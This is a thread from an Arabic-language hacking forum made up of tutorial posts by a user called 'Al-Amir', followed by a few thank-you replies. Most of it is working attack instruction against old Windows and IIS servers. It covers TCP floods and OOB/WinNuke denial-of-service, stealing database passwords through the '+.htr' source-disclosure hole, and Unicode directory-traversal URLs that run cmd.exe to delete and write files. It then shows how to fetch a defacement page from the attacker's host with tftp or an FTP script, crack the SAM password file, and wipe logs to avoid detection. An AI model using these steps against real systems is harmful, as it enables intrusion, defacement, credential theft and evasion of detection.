      الأجابة هي انه يمكن الهجوم عليه مثل الهجوم على النظامين السابقين بالضبط أي عن طريق الفلود. وهنا يكون عن طريق ارسال حزم طلب كثيرة اليه وبالطبع سيحاول الرد عليها كلها وهذا مالايستطيعه وبخاصة اذا كانت الحزم كثيرة جدا وفي وقت زمني قليل. وعند كمية معينة بسرعة عالية معينة تعتمد على قوة اتصالك يبدأ التأثير الكبير لهكذا هجوم.

      الحماية منه :
      بالطبع برامج الفايروول وبرامج اخرى عديدة تجدها بمواقع الهكر منتشرة وتقوم بحمايتك من الفلود الموجه للـTCP الخاص بك.

      أنظمة التشغيل المتأثرة:
      جميع اصدارات الويندوز تتأثر بهذا الهجوم وأيضا جميع طبقات اليونكس تتأثر بهجوم معين يؤدي الى ايقافها مؤقتا (لاق Lag) أو حتى فصل اتصالها وبالطبع يعتمد على درجة الحماية للسيرفر المتعرض للهجوم.

      ملاحظة: أشهر واكثر برنامج منتشر يقوم بالهجوم على هذا البروتوكول لنظام ويندوز هو برنامج (Port Fuck) الذي يقوم بالأتصال عبر منافذ التي سي بسرعة علية ومن ثم الفصل واعادة العملية عدة مرات بسرعة. وبالنسبة للينوكس فهنالك انواع عديدة من نصوص (.C) التي تقوم بهجوم كهذا.
      -----------------------------------------------------

      OOB
      أو ما يسمى بـ(OutOfBand). وهو خطير جداً لأنه لا يحتاج لعمل شئ كثير لأنشاء تأثير كبير في جهاز الضحية.
      وعن طريق أرسال معلومات OOB الى منفذ رقم 139 الخاص بويندوز NT (الأصدارات القديمة بالطبع) فأنه من الممكن بسهولة أحداث أثر كبير في جهاز الضحية منها تدمير TCP الخاص بجهاز الضحية (stop 0xA error in tcp.sys). وكل ما تحتاج اليه هو الأتصال بالمنفذ المفتوح فقط (Connect the Socket). أي بالطريقة التالية: (الأتصال بمنفذ رقم 139 في جهاز الضحية ومن ثم المعلومات المضرة به - send the MSG_OOB flag set).
      وبالطبع فأن ويندوز 95 كذلك معرض لهذا النوع من الهجوم ولكن بضرر أقل حيث انه لا يتم تجميده بالكامل ولكن يفقد أتصاله او يضعفه.
      وقد تجد صعوبة في تنفيذ الكلام السابق ولكن لاداعي لأجهاد نفسك فبرامج الهجوم عن طريق OOB تكاد تملأ مواقع الهكر في كل مكان وبأشكال والوان عديدة مثل برنامح (WinNuke) القديم، والتي لا تطلب منك سوى رقم الآيبي للضحية فقط ومن ثم الضغط على زر Nuke. ولكنه أيجاد ضحية يتضرر بهجوم كهذا قريب من المستحيل في الوقت الحالي.
      وبالطبع وجود عيب كهذا في نظام شهير ومنتشر كالويندوز يؤدي الى وجود باتش مخصص لأغلاق المنفذ واصلاح النظام. (يعني ترقيع). أسم الباتش (OOB Fix) ويمكنك الحصول عليه من اي موقع هكر تقريبا.

      الحماية من OOB:
      كما ذكرت سابقا يمكنك استخدام (رقعة المايكروسوت) او هنالك عدة برامج تحمي من مثل هذا الهجوم عن طريق مراقبة المنفذ 139 وصد الهجوم القادم عبره. وتقريبا جميع انواع الفايروول تتعرف على هجوم قديم كهذا.

      أنظمة التشغيل المتضررة بالـOOB:
      ويندوز 95 وويندوز NT القديم -كما ذكرت سابقا- تتظرر بهكذا هجوم عليها.

      هذا كل شي عن حصة اليوم وللحديث بقيه إن شاء الله
      الأمير
    • تعلم اختراق SQL

      اخواني الكرام ....
      في هذا الدرس سوف نتحدث عن بعض الطرق او المهارات في إختراق الاس كيو ال انا اعتقد ان هذا الملف ليس بالمستوى المطلوب
      لكنها محاولات بسيطة ارجوا ان تفيد الجميع .



      س :في البداية ماهي الاس كيو ال ( SQL )؟؟

      الاس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب ASP هي صفحات تسحب بياناتها
      من قاعدة SQL وصفحات ASP ممكن ان تكون كنز من المعلومات لاختراق قواعد بيانات SQL وهذا ماسوف اشير اليه لاحقا ، و SQL
      تتنصت على البورت 1433
      ايضا مااريد ان اخبرك به ان ال SQL قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على عدد من الجداول يمكن
      ان تتصور كبرقواعد بيانات SQL والعدد الكبير من البيانات التى تحتويها .

      س : مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات SQL ؟
      هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى لا اقصد منتديات PHP بل منتديات ASP في الغالب سوف تحصل على جميع اسماء
      المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلاحيات لم تكن تحلم بها ، اما اذا كان الموقع يحتوي على ميزة
      قائمة المراسلات فسوف تحصل على اعداد خيالية من الايميلات ، عندها قم بانشاء شركة للدعاية والاعلان وسوف تصبح ثريا اذن لاتنسى LinuxRay_
      توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص - ارقام هواتف - عناوين - تورايخ الميلاد ، ممكن ان تصبح Administrator .


      اعرف انه قد اصابك الملل الان لكن استعد نشاطك من جديد فالطريق مازال طويلا ...


      س : مالذي تحتاجة للدخول على قواعد بيانات SQL ؟

      تحتاج فقط لل User Name و Passwd

      س : من اين احصل على اسم المستخدم وكلمة المرور ؟

      هناك طرق عديدة للحصول على User name and Passwd منها كما اسلف صفحات ال ASP وملفات اخرى من نوع *.sql هناك ثغرات كثير يمكن
      ان تحصل منها على كلمات المرور مثل ثغرة +.htr
      كيف تستخدم هذه الثغرة :


      http://target/page.asp+.htr
      target : الموقع الهدف
      Page : صفحة asp
      +.htr : الثغرة


      هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لاتحتوي على اي حرف .... اعرف انك سوف تتساءل مالفائدة اذن منها الفائدة هو
      خلف هذه الصفحة البيضاء اذهب الى View Source لكي ترى اوامر البرمجة الخاصة ب ASP التى لايمكن لك ان تراها في الوضع العادي : مثل


      <%

      Set DB= Server.CreateObject("ADODB.Connection")
      DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"


      %>
      -----------------------------------------------------------------
      في الكود السابق ترى ان اسم المستخدم هو _LinuxRay
      وكلمة السر هي 6666666
      -----------------------------------------------------------------



      الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ASP مثل الاتي :

      AMicrosoft VBScript runtime error '800a01a8'

      Object required: 'Conn'

      /filename.inc, line 5

      هناك ملف ينتهي بامتداد *.inc هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم المستخدم وكلمة المرور
      اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع .


      وممكن ان ترى مثل هذا الامر في صفحة ASP
      عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف database.inc

      <!--#include file = "database.inc"-->


      وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات

      global.asa
      ++global.asa
      beforemilion-global.asa
      -global.asa
      milion.sql
      global-direct.asa

      ليس من الضرورة ان تكون الملفات بهذه الاسماء لكن هذا هو المعتاد عليه من قبل مبرمجين SQL

      وكل ماعليك فعله ان تكتب اسم الصفحة مثل الاتي :

      global.asa+.htr

      هناك ثغرة قديمة في IIS 3 وهي ان تضيف بعد صفحة ASP هذا الرمز ::$data كما يلي
      file.asp::$data
      هذه الثغرة لاتعمل الا على IIS 3 فلا تتعب نفسك بتطبيقها فقط للعلم لا اكثر .


      لقد اقتربنا من النهاية ... ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟

      بعدها الدخول على قاعدة ال SQL !!

      هناك عدة برامج تدخل على قاعدة البينات انا استخدم Visual interdev 6.0 لكني مازلت افضل استخدام البرنامج السهل ACCESS 2000


      كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة
      File
      اختر
      New
      ومن قائمة الملفات الجديدة اختار
      Project (Exiting Data)
      اي مشروع قاعدة بيانات موجودة .
      سيظهر لك مربع لانشاء الملف اختر
      Create
      اي انشاء

      الان سترى مربع
      Data Link Properties

      تحتاج فقط لثلاث معلومات اسم الموقع او الاي بي - اسم المستخدم - كلمة المرور

      1 - ادخل اسم الموقع في صندوق Select or enter server name

      2 - اسم المستخدم في User Name

      3 - كلمة السر Password


      ملاحظة ( قم بإزالة الصح من مربع Blank Password)

      اضغط في البداية على Test Connection في الاسفل لاختبار الاتصال بقاعدة البيانات اذا رأيت هذه العبارة Test Connection Succeeded
      فمعناه ان الاتصال بقاعدة البيانات تم بنجاح.
      يمكنك الان ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة :
      Select the data base on the server
      واضغط على OK .


      أتمنى أن تكونوا قد إستفدتم من هذا الدرس .
      تقبلو تحياتي
      الأمير
    • قم بقراءة النص كاملا أولا

      سأعيد تعريف Telnet من جديد و لكن بطريقه اكثر بساطه ..
      Telnet هو برنامج يستخدم في إنشاء وصله بين جهازين ،و الجهاز المتصل يستخدم عنوان الجهاز المستهدف و رقم المنفذ Port الذي سيتم الاتصال عليه ،و الجهاز المستهدف (الخادم) يشغل برنامج آخر (Daemon) يستمع على هذا المنفذ و تتم عمليه الإرسال والاستقبال باستخدام أحد البروتوكولات .
      تشبيه من حياتنا العملية : نفترض أن هناك رجل في فرنسا (المستهدف) و أنت (المتصل) تريد إقامة حوار معه (وصله) و أنت في مصر .. فلابد لك من استخدام وسيله اتصال (Telnet) و لنفرض أنها الهاتف الذي لابد للرجل أن يضعه على أذنه (Daemon) لكي يسمعك .. و لنفرض أيضا أن هذا الرجل لا يتحدث العربية .. إذن فلابد لك من استخدام الفرنسية (البروتوكول المستخدم) حتى تتحدث (الإرسال والاستقبال) بحريه .

      مما سبق نستنتج أن Telnet هو مجرد وصله (مثل الهاتف) .. و انه لابد لنا من معرفة البروتوكول المستخدم في الاتصال حتى ننجح في الإرسال و الاستقبال . كما انه لابد لنا من أن نعرف أيضا أنه لابد من برنامج Daemon يتسمع على المنفذ المراد الاتصال عليه .

      استخدام Telnet ك FTP Client
      المنفذ الذي سيتم الاتصال عليه في حاله استخدامنا بروتوكول نقل الملفات FileTransfer Protocol في الغالب سيكون 21 ..

      أين الصعوبة إذن ؟
      الصعوبة تكمن في أننا لكي نستخدم Telnet ك FTP Client يجب علينا الإلمام بقدر كبير ببروتوكول FTP !!
      و لكن هذا لن يمنعني من عرض بعض الأمثلة لإظهار كيفية التعامل مع هذا البروتوكول ..

      بدء الاتصال
      1 - قم بتشغيل Telnet و شبك على ftp.zdnet.com بالمنفذ 21
      و هذا ما سيظهر لك

      Sources Code - شفرة

      220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready.



      و السطر السابق يسمي Banner الخاص بال FTP Daemon المستخدم في موقع zdnet و هي تختلف باختلاف الموقع الذي سيتم التشبيك عليه . و الرقم الموجود في البداية يدل على نجاح الاتصال و هو رقم ثابت .
      2 - الخطوة التالية هي الولوج باستخدام اسم المستخدم Username و كلمة السر Password .. بما أن zdnet تدعم المستخدم Anonymous سيتم استخدامه في الولوج للنظام كالتالي:
      ستكتب

      Sources Code - شفرة


      user anonymous



      و سيستجيب الخادم بالتالي

      Sources Code - شفرة


      331 Guest login ok, send your complete e-mail address as password.



      ثم تكتب أنت التالي

      Sources Code - شفرة


      pass @zorro



      و بالطبع عند الولوج بالمستخدم Anonymous تقوم بإعطاء عنوان البريد الإلكتروني الخاص بك ككلمة السر .. و إذا لم ترد إعطاء بريدك فيمكنك أن تكتب أي شئ يأخذ شكل البريد (أي يحتوي على الرمز @)
      و سيستجيب الخادم بالتالي

      Sources Code - شفرة


      230-You are user #552 of 2000 simultaneous users allowed.
      230-
      230 Logged in anonymously.



      و بالطبع تلك الإستجابه قد تختلف من موقع لآخر .. إلا في الرقم في بداية كل سطر ..
      أنت الآن قد قمت بالولوج إلى الخادم بنجاح .

      بعد أن تمت عمليه الولوج للنظام يجب إنشاء وصله لإرسال واستقبال البيانات (قائمه بالملفات الموجودة أو الملفات ذاتها) .. إذن ما الذي كنا نفعله منذ قليل ؟!! ما قد فعلناه منذ قليل هو إنشاء وصله لإرسال الأوامر للنظام و استقبال استجابة النظام على الأوامر .
      و لكي ننشئ تلك الوصلة ،هناك طريقتين
      الأولي : تنشئ هذه الطريقة الوصلة بان يرسل الزبون (أنت) رقم IP الخاص به و المنفذ المفتوح الذي يستطيع الخادم استخدامه في إرسال البيانات .
      و لكن تلك الطريقة تتطلب منك فتح أحد المنافذ على جهازك و هذا سيتطلب برنامج خاص لفتح هذا المنفذ .. و لذلك لن نستخدم تلك الطريقة .
      الثانية : تنشئ هذه الطريقة الوصلة بان يرسل الزبون الأمر PASV

      Sources Code - شفرة


      PASV



      و سيرد الخادم برقم IP الخاص به و المنفذ المفتوح (على الخادم بالطبع) الذي يستطيع الزبون (أنت) الاتصال عليه ..
      مثال

      Sources Code - شفرة


      227 Entering Passive Mode (207,189,69,61,12,41)



      و الرقم الطويل الموجود بين الأقواس تفسيره كالتالي ..
      أول أربع مجموعات (من اليسار) هو ال IP الخاص بالخادم و في هذه الحالة يكون 207,189,69,61 .. أما الرقمان التاليان فيمثلان رقم المنفذ و يتم حسابه كالتالي
      12 × 256 + 41 = 3113

      و لذلك فالخطوة التالية التي يجب على الزبون اتباعها هي فتح وصله جديده مع الخادم على المنفذ 3113 .. ولكي تقوم بمثل هذا الأمر يتوجب عليك فتح نافذة Telnet جديده و تشبك على ftp.zdnet.com بالمنفذ 3113 ..
      إذن عندما تريد أن ترسل أحد الأوامر سترسله من النافذة الأولى و النافذة الثانية ستظهر بها البيانات ..
      مثال
      عندما ترسل الأمر LIST (يستخدم لعرض محتويات الدليل) في النافذة الأولى

      Sources Code - شفرة


      LIST



      سيستجيب الخادم بالتالي في النافذة الأولى أيضا

      Sources Code - شفرة

      125 Data connection already open; Transfer starting.



      و ستظهر محتويات الدليل في النافذة الثانية ثم سيتم غلق الاتصال في النافذة الثانية بمجرد إتمام عرض محتويات الدليل .

      و هكذا كلما أردت أن ترسل أمر عرض محتويات دليل ما أو استقبال أو إرسال ملف ما ، يجب أن تبدأ بأمر PASV .. ثم تنشئ اتصالا جديدا بعد حساب رقم المنفذ باتباع الخطوات السابقة .

      إلى هنا و أظن أنني قد تماديت .. و لكنني لم استطع أن امنع نفسي من مشاركتكم بهذا الموضوع الممتع (ممتع بالنسبة إلي) .

      ملاحظات هامة
      - لربما تتساءل الآن .. ألا أستطيع بدلا ممن كل هذا الهراء أن استخدم برنامج جاهز مثل CuteFTP ؟!! بالطبع تستطيع و لكن لن يضرك أن تعلم شيئا عن البروتوكول الذي تستخدمه و ربما بعد تعلم البروتوكول تستطيع أن تصنع برنامجك الخاص
      - اقرأ الدرس مره و مرتين حتى تستوعب الفككرة تماما ثم اسأل فيما شئت
      - لتعلم اكثر عن هذا الموضوع قم بزيارة اللمواقع التالية
      vbip.com/winsock/winsock_ftp_01.asp
      (ينصح به بشده)
      vbip.com/winsock/winsock_ftp_ref_01.htm (ينصح به بشده)
      cis.ohio-state.edu/htbin/rfc/rfc0959.html (لمن اراد التعمق في البروتوكول)

      وإلى اللقاء في الدرس التالي

      الأمير
    • اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس

      أرجوا متـابعة هذا الدرس لأهميته .....

      اليونيكود


      يحتوى الدرس الاول على ( 13 نقطة ) وهي كما يلي :-

      - تعريف باليونيكود .
      اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .

      - تاريخ ظهور هذه الثغرة .
      لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .

      كيفية ايجاد هذه الثغرات .
      يتم ايجاد هذه الثغرات بطريقتين :-

      1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .

      2- بواسطة تطبيق الثغرة على الموقع مباشرة .


      كيف يتم استغلال ثغرات اليونكود .
      عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMDبفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها

      الاوامر المستخدمة بواسطة ملف CMD .
      الاوامر المستخدمه بواسطة ملف الـCMD وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
      امر انشاء دليل جديد: xxxx.com/msadc/..%c0%af../..%c…em32/cmd.exe?/c+md+c:\hEx





      امر الغاء دليل: xxxx.com/msadc/..%c0%af../..%c…em32/cmd.exe?/c+rd+c:\hEx


      للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات





      الامر المستخدم للنسخ:


      xxxx.com/msadc/..%c0%af../..%c…:\inetpub\scripts\hEx.exe





      الامر المستخدم للنقل:


      xxxx.com/msadc/..%c0%af../winn…etpub\scripts\hEx.exe+c:\





      الامر المستخدم للحذف: xxxx.com/msadc/..%c0%af../..%c…cmd.exe?/c+del+c:\hEx.mdb





      الامر المستخدم لتغيير مسمى الملفات: xxxx.com/msadc/..%c0%af../winn…+ren+c:\index.htm+hEx.htm





      الامر المستخدم لرؤية محتويات الملف: xxxx.com/msadc/..%c0%af../..%c…md.exe?/c+type+c:\hEx.txt





      الامر المستخدم للكتابة داخل أي ملف:


      xxxx.com/msadc/..%c0%af../winn…d.exe?/c+echo+sNiper_hEx+>c:\hEx.txt



      الامر المستخدم لعملية سحب أي ملف:


      عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:


      xxxx.com/msadc/hEx.mdb



      طريقة تطبيق هذه الثغرات .
      تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-

      xxxx.com/scripts/..%c1%1c../wi…stem32/cmd.exe?/c+dir+c:\

      xxxx.com/scripts/..%c0%9v../wi…stem32/cmd.exe?/c+dir+c:\

      xxxx.com/scripts/..%c0%af../wi…stem32/cmd.exe?/c+dir+c:\

      xxxx.com/scripts/..%c0%qf../wi…stem32/cmd.exe?/c+dir+c:\

      xxxx.com/scripts/..%c1%8s../wi…stem32/cmd.exe?/c+dir+c:\

      xxxx.com/scripts/..%c1%9c../wi…stem32/cmd.exe?/c+dir+c:\

      xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c:\

      وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-

      Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin

      كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
      في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-

      xxxx.com/msadc/..%c0%af../..%c…stem32/cmd.exe?/c+dir+c:\



      فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-

      xxxx.com/msadc/..%c0%af../..%c…inetpub\scripts\w3svc.exe



      بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-

      xxxx.com/scripts/w3svc.exe?/c+dir+c:\

      الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل

      inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :-

      xxxx.com/scripts/w3svc.exe?/c+…r_hEx+hExRay@Hotmail.com+>+c:\inetpub\wwwroot\index.htm
      طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
      الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-

      xxxx.com/msadc/..%c0%af../..%c…\inetpub\scripts\cmd1.exe

      الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-

      xxxx.com/msadc/..%c0%af../..%c…stem32/cmd1.exe?c+dir+c:\

      كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
      تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-

      1- الطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-

      xxxx.com/msadc/..%c0%af../..%c…\inetpub\scripts\cmd1.exe

      2- الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-

      o اولا انشاء صفحة باسم test.shtml

      o تكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml

      o كتابة هذا الكود داخل الصفحة <!--#include file="AAAA[...]AA"--> بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .

      o الان يتم طلب الصفحة من خلال المتصفح xxxx.com/test.shtml

      o الان سوف تظهر لك الصفحة .

      o الان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied .

      o اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .

      3- الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .

      4- الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .

      5- البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .

      كيفية عمل اكاونت للدخول بواسطة الـFTP .
      1- نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة

      /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe

      2- انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open ftp.host.com حيث ان هذا هو الخادم للـFTP .

      /c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl

      3- الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll

      /shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl

      4- الان مطلوب ادراج البريد hExRay@Hotmail.Com الى نفس الملف الذي قمنا بانشاءه mspft.pll

      /shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl

      5- إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll

      /shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl

      6- الان تكرار لحاجة الاعداد

      /shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl

      7- يتم هنا ادراج الموقع الحالي للملفات

      /shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl

      8- الان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق

      /shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl

      9- هنا نفس السابق ولكن باضافة Quit

      /shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl

      10- الان يتم تنفيذ امر FTP.exe?+"-s:c:winnt\mspft.ppl” وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-

      - Open FTP.host.com

      - Anonymous

      - hEx@Hotmail.Com

      - User Anonymous

      - hEx@Hotmail.Com

      - Get index.html

      - Quit



      /msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"


      طريقة كشف باسورد الادمينستريتور .

      نحتاج الى وجود برنامجين ( Microsoft Access – L0phtCrack ) وهي لزوم تنفيذ بعض الخطوات لتالية وهي :-
      - باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack

      اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-

      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL



      - اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-

      xxxx.com/default.asp+.htr



      عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات .





      - تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .

      1- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\

      2- قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .

      /c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm



      tftp.exe
      وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر

      "-i"
      وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات

      1.1.1.1
      رقم الايبي الخاص بك

      GET
      وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال

      index.htm
      اسم الملف بجهازك

      \inetpub\wwwroot\
      اسم الدليل في السيرفر

      index.htm
      اسم الملف على السيرفر






      - مسح ملفات اللوق حتى لا يتم التعرف عليك .

      وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System32 بواسطة الامر :-

      /c+del+c:/winnt/system32/logfiles/*.log



      انتهى الدرس ،،،



      والموعد يتجدد غدا إن شاء الله ......

      الأمير
    • شكرا الأمير ولكن.......

      شكرا الأمير على هذه المعلومات والتي تعتبر من اصعب مجالات نظام الشبكات والإختراق.
      ولكن ألا تعتقد أنه بدون معرفة قواعد وأساسيات أنظمة الشبكات,يصعب على القارى للوهله الأولى إدراك وفهم تعابير ومفردات هذا النظام المعقد.

      وفي إعتقادي انه يجب دراسه ومعرفه أنظمه الشبكات قبل الدخول في حوامة الإختراق وأقصد من كلامي هذا انه من المهم دراسه انظمه الشبكات([COLOR='00BFFF']N[/COLOR][COLOR='04B9FD']e[/COLOR][COLOR='09B3FB']t[/COLOR][COLOR='0DADF9']w[/COLOR][COLOR='12A7F7']o[/COLOR][COLOR='16A1F5']r[/COLOR][COLOR='1B9BF3']k[/COLOR][COLOR='1F95F1'],[/COLOR][COLOR='2490EE']a[/COLOR][COLOR='288AEC']d[/COLOR][COLOR='2D84EA']v[/COLOR][COLOR='317EE8']a[/COLOR][COLOR='3678E6']n[/COLOR][COLOR='3A72E4']c[/COLOR][COLOR='3F6CE2']e[/COLOR][COLOR='4865D9']d[/COLOR][COLOR='555ECA'] [/COLOR][COLOR='6257BA']N[/COLOR][COLOR='6F50AB']e[/COLOR][COLOR='7C489B']t[/COLOR][COLOR='89418C']w[/COLOR][COLOR='963A7C']o[/COLOR][COLOR='A3336D']r[/COLOR][COLOR='B02B5D']k[/COLOR][COLOR='BD244E'],[/COLOR][COLOR='CB1D3E']C[/COLOR][COLOR='D8162F']i[/COLOR][COLOR='E50E1F']s[/COLOR][COLOR='F20710']c[/COLOR][COLOR='FF0000']o[/COLOR]).
    • [COLOR='00BFFF']ش[/COLOR][COLOR='02BCFE']ك[/COLOR][COLOR='05B9FD']ر[/COLOR][COLOR='07B6FC']ا[/COLOR][COLOR='09B2FB'] [/COLOR][COLOR='0CAFFA']خ[/COLOR][COLOR='0EACF8']ا[/COLOR][COLOR='11A9F7']ص[/COLOR][COLOR='13A6F6'] [/COLOR][COLOR='15A3F5']ا[/COLOR][COLOR='18A0F4']ل[/COLOR][COLOR='1A9DF3']ى[/COLOR][COLOR='1C99F2'] [/COLOR][COLOR='1F96F1']ا[/COLOR][COLOR='2193F0']ل[/COLOR][COLOR='2390EF']ا[/COLOR][COLOR='268DEE']م[/COLOR][COLOR='288AEC']ي[/COLOR][COLOR='2B87EB']ر[/COLOR][COLOR='2D84EA'] [/COLOR][COLOR='2F80E9']ع[/COLOR][COLOR='327DE8']ل[/COLOR]d#d#[COLOR='347AE7']ى[/COLOR][COLOR='3677E6'] [/COLOR][COLOR='3974E5']ا[/COLOR][COLOR='3B71E4']ل[/COLOR][COLOR='3D6EE3']ج[/COLOR][COLOR='406BE2']ه[/COLOR][COLOR='4067E2']د[/COLOR][COLOR='3D63E3'] [/COLOR][COLOR='3B5FE4']ا[/COLOR][COLOR='395CE5']ل[/COLOR][COLOR='3658E6']ك[/COLOR][COLOR='3454E7']ب[/COLOR][COLOR='3250E8']ي[/COLOR][COLOR='2F4CE9']ر[/COLOR][COLOR='2D49EA'] 